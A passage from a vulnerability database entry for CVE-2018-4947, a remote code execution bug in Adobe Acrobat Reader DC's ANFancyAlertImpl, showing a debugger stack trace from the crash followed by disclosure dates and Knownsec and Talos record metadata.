0016c764 774f7258 Annots!PlugInMain+0x1bd3e0 *** WARNING: Unable to verify checksum for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api *** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\Program Files\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api - 0016c790 515bd6b2 Annots!PlugInMain+0x73357 0016c800 515c1c35 EScript!mozilla::HashBytes+0x2d050 0016c830 5159387b EScript!mozilla::HashBytes+0x315d3 0016c8c0 515932df EScript!mozilla::HashBytes+0x3219 0016c8dc 515bd21d EScript!mozilla::HashBytes+0x2c7d 0016c928 515bd1b0 EScript!mozilla::HashBytes+0x2cbbb 0016c944 515c1a3e EScript!mozilla::HashBytes+0x2cb4e 0016c960 515c19d5 EScript!mozilla::HashBytes+0x313dc 0016c990 515db61f EScript!mozilla::HashBytes+0x31373 0016c9e4 515db51f EScript!mozilla::HashBytes+0x4afbd 0016c9fc 7763d6c7 EScript!mozilla::HashBytes+0x4aebd 0016ca3c 774a5069 Annots!PlugInMain+0x1b97c6 0016ca5c 774a4f71 Annots!PlugInMain+0x21168 0016ca9c 7763d663 Annots!PlugInMain+0x21070 0016cadc 774a5069 Annots!PlugInMain+0x1b9762 0016cafc 7763d75e Annots!PlugInMain+0x21168 0016cb2c 515db634 Annots!PlugInMain+0x1b985d ``` ### Timeline * 2018-01-23 - Vendor Disclosure * 2018-05-15 - Public Release |
id | SSV:97294 |
last seen | 2018-06-08 |
modified | 2018-05-17 |
published | 2018-05-17 |
reporter | Knownsec |
title | Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability(CVE-2018-4947) |
Talos
id | TALOS-2018-0518 |
last seen | 2019-05-29 |
published | 2018-05-15 |
reporter | Talos Intelligence |
source | http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0518 |
title | Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability |